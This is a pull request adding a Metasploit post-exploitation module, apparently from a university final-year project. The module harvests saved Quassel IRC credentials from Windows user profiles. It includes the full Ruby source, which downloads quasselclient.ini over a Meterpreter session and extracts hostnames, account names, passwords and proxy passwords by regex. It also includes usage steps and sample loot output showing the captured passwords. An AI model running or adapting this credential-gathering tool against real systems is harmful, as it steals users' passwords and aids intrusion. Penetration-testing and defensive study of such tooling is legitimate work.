### PR TITLE
Add Quassel IRC PackRat module

### DIFF
--- a/documentation/modules/post/windows/gather/credentials/quassel_irc.md
+++ b/documentation/modules/post/windows/gather/credentials/quassel_irc.md
@@ -1,0 +1,132 @@
+## Vulnerable Application
+
+  This post-exploitation module extracts clear text credentials from the Quassel IRC Client.
+
+  The Quassel IRC Client is avaialble from (https://quassel-irc.org/downloads).
+
+  This module extracts information from the quasselclient.ini file in the "AppData\Roaming\quassel-irc.org" directory.
+
+  This module extracts server information such as host name, port, account name, password and proxy password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/quasell_irc
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### Default Output
+```
+msf6 post(windows/gather/credentials/quassel_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Quassel irc's Quasselclient.ini file found
+[*] Downloading C:\Users\test\AppData\Roaming\quassel-irc.org\quasselclient.ini
+[*] Quassel irc Quasselclient.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240507163717_default_10.0.0.2_QuasselIRCquass_570372.ini
+
+[+] 1\HostName=10.245.100.2
+[+] 2\HostName=10.0.0.3
+[+] 1\Port=4242
+[+] 2\Port=1234
+[+] 1\AccountName=Test
+[+] 2\AccountName=Test#2
+[+] 1\Password=tiaspbiqe2r
+[+] 2\Password=tiaspbiqe2r
+[+] 1\ProxyHostName=localhost
+[+] 2\ProxyHostName=
+[+] 1\ProxyPort=8080
+[+] 2\ProxyPort=8080
+[+] 1\ProxyUser=test
+[+] 2\ProxyUser=
+[+] 1\ProxyPassword=tiaspbiqe2r
+[+] 2\ProxyPassword=
+[+] File with data saved:  /home/kali/.msf4/loot/20240507163717_default_10.0.0.2_EXTRACTIONquasse_134569.ini
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```
+
+### Verbose Output
+```
+
+msf6 post(windows/gather/credentials/quassel_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Quassel irc's base folder not found in user's user directory
+
+[*] Starting Packrat...
+[*] Quassel irc's base folder found
+[*] Found the folder containing specified artifact for quasselclient.ini.
+[*] Quassel irc's Quasselclient.ini file found
+[*] Processing C:\Users\test\AppData\Roaming\quassel-irc.org
+[*] Downloading C:\Users\test\AppData\Roaming\quassel-irc.org\quasselclient.ini
+[*] Quassel irc Quasselclient.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240507164141_default_10.0.0.2_QuasselIRCquass_310535.ini
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\HostName=10.245.100.2
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\HostName=10.0.0.3
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\Port=4242
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\Port=1234
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\AccountName=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\AccountName=Test#2
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\Password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\Password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\ProxyHostName=localhost
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\ProxyHostName=
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\ProxyPort=8080
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\ProxyPort=8080
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\ProxyUser=test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\ProxyUser=
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 1\ProxyPassword=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] 2\ProxyPassword=
+[+] File with data saved:  /home/kali/.msf4/loot/20240507164141_default_10.0.0.2_EXTRACTIONquasse_967148.ini
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+```

--- a/documentation/modules/post/windows/gather/credentials/quassel_irc.md
+++ b/documentation/modules/post/windows/gather/credentials/quassel_irc.md
@@ -35,7 +35,7 @@ This option is turned on by default and will perform the data extraction using t
 regular expression. The 'Store loot' options must be turned on in order for this to take work.
 
 ## Scenarios
-### Default Output
+### Quassel Client v0.14.0 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
 ```
 msf6 post(windows/gather/credentials/quassel_irc) > run
 
@@ -71,7 +71,7 @@ msf6 post(windows/gather/credentials/quassel_irc) > run
 
 ```
 
-### Verbose Output
+### Quassel Client v0.14.0 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
 ```
 msf6 post(windows/gather/credentials/quassel_irc) > run
 

--- a/documentation/modules/post/windows/gather/credentials/quassel_irc.md
+++ b/documentation/modules/post/windows/gather/credentials/quassel_irc.md
@@ -73,7 +73,6 @@ msf6 post(windows/gather/credentials/quassel_irc) > run
 
 ### Verbose Output
 ```
-
 msf6 post(windows/gather/credentials/quassel_irc) > run
 
 [*] Filtering based on these selections:  

--- a/documentation/modules/post/windows/gather/credentials/quassel_irc.md
+++ b/documentation/modules/post/windows/gather/credentials/quassel_irc.md
@@ -1,12 +1,12 @@
 ## Vulnerable Application
 
-  This post-exploitation module extracts clear text credentials from the Quassel IRC Client.
+This post-exploitation module extracts clear text credentials from the Quassel IRC Client.
 
-  The Quassel IRC Client is avaialble from (https://quassel-irc.org/downloads).
+The Quassel IRC Client is avaialble from (https://quassel-irc.org/downloads).
 
-  This module extracts information from the quasselclient.ini file in the "AppData\Roaming\quassel-irc.org" directory.
+This module extracts information from the quasselclient.ini file in the "AppData\Roaming\quassel-irc.org" directory.
 
-  This module extracts server information such as host name, port, account name, password and proxy password.
+This module extracts server information such as host name, port, account name, password and proxy password.
 
 
 ## Verification Steps

--- a/modules/post/windows/gather/credentials/quassel_irc.rb
+++ b/modules/post/windows/gather/credentials/quassel_irc.rb
@@ -71,7 +71,6 @@ class MetasploitModule < Msf::Post
 
     register_options(
       [
-        # OptRegexp.new('REGEX', [false, 'Match a regular expression', '^secret']),
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below

--- a/modules/post/windows/gather/credentials/quassel_irc.rb
+++ b/modules/post/windows/gather/credentials/quassel_irc.rb
@@ -1,0 +1,96 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  # this associative array defines the artifacts known to PackRat
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+  include Msf::Post::Windows::Packrat
+  ARTIFACTS =
+    {
+      application: 'Quassel IRC',
+      app_category: 'IRC',
+      gatherable_artifacts: [
+        {
+          filetypes: 'bookmarks',
+          path: 'AppData',
+          dir: 'quassel-irc.org',
+          artifact_file_name: 'quasselclient.ini',
+          description: 'Saved Bookmarks',
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:[0-9]+\\\HostName=.*)',
+                '(?i-mx:[0-9]+\\\Port=.*)',
+                '(?i-mx:[0-9]+\\\AccountName.*)',
+                '(?i-mx:[0-9]+\\\Password=.*)',
+                '(?i-mx:[0-9]+\\\ProxyHostName=.*)',
+                '(?i-mx:[0-9]+\\\ProxyPort=.*)',
+                '(?i-mx:[0-9]+\\\ProxyUser.*)',
+                '(?i-mx:[0-9]+\\\ProxyPassword=.*)',
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Quassel IRC credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for credentials stored on Quassel IRC Client in a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Kazuyoshi Maruta',
+          'Daniel Hallsworth',
+          'Barwar Salim M',
+          'Jacob Tierney',
+          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
+        ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        # OptRegexp.new('REGEX', [false, 'Match a regular expression', '^secret']),
+        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
+        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
+        # enumerates the options based on the artifacts that are defined below
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
+  end
+
+  def run
+    print_status('Filtering based on these selections:  ')
+    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
+    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
+    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
+
+    # used to grab files for each user on the remote host
+    grab_user_profiles.each do |userprofile|
+      run_packrat(userprofile, ARTIFACTS)
+    end
+
+    print_status 'PackRat credential sweep Completed'
+  end
+end

--- a/modules/post/windows/gather/credentials/quassel_irc.rb
+++ b/modules/post/windows/gather/credentials/quassel_irc.rb
@@ -53,10 +53,10 @@ class MetasploitModule < Msf::Post
         },
         'License' => MSF_LICENSE,
         'Author' => [
+          'Jacob Tierney',
           'Kazuyoshi Maruta',
           'Daniel Hallsworth',
           'Barwar Salim M',
-          'Jacob Tierney',
           'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
         ],
         'Platform' => ['win'],


### PR DESCRIPTION
As A part of my final year project at Leeds Beckett University, I have developed several post-exploitation modules utilising the existing PackRat framework built by former LBU students. This PR will add a new `/post/windows/gather/credentials` module for the Quassel IRC Client. [https://quassel-irc.org/downloads](url)

This pull request will add two files:
1. modules/post/windows/gather/credentials/quassel_irc.rb
2. documentation/modules/post/windows/gather/credentials/quassel_irc.md


## Verification

1. Start `msfconsole`
2.  Get a Meterpreter session on a Windows system
3. `use post/windows/gather/credentials/quassel_irc`
4. `Set SESSION 1`
5. `run`

## Scenario
Using Quassel Client v0.14.0 running on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045
```
msf6 post(windows/gather/credentials/quassel_irc) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Quassel irc's Quasselclient.ini file found
[*] Downloading C:\Users\test\AppData\Roaming\quassel-irc.org\quasselclient.ini
[*] Quassel irc Quasselclient.ini downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240507163717_default_10.0.0.2_QuasselIRCquass_570372.ini

[+] 1\HostName=10.245.100.2
[+] 2\HostName=10.0.0.3
[+] 1\Port=4242
[+] 2\Port=1234
[+] 1\AccountName=Test
[+] 2\AccountName=Test#2
[+] 1\Password=tiaspbiqe2r
[+] 2\Password=tiaspbiqe2r
[+] 1\ProxyHostName=localhost
[+] 2\ProxyHostName=
[+] 1\ProxyPort=8080
[+] 2\ProxyPort=8080
[+] 1\ProxyUser=test
[+] 2\ProxyUser=
[+] 1\ProxyPassword=tiaspbiqe2r
[+] 2\ProxyPassword=
[+] File with data saved:  /home/kali/.msf4/loot/20240507163717_default_10.0.0.2_EXTRACTIONquasse_134569.ini
[*] PackRat credential sweep Completed
[*] Post module execution completed
```